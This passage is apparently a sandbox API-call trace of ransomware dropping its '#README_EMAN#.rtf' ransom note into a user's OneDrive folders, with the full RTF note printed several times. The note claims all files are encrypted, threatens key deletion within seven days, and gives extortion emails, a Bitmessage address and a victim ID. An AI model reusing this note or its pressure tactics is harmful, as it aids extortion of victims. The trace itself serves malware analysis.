!!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9b08, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\r", lpUsedDefaultChar=0x0) returned 8717 [0294.915] WriteFile (in: hFile=0x2ec, lpBuffer=0x1ef9b08*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9b08*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0294.916] CloseHandle (hObject=0x2ec) returned 1 [0294.916] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cs\\#readme_eman#.rtf")) returned 0xffffffff [0294.916] GetLastError () returned 0x2 [0294.916] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cs\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0294.917] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0294.917] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 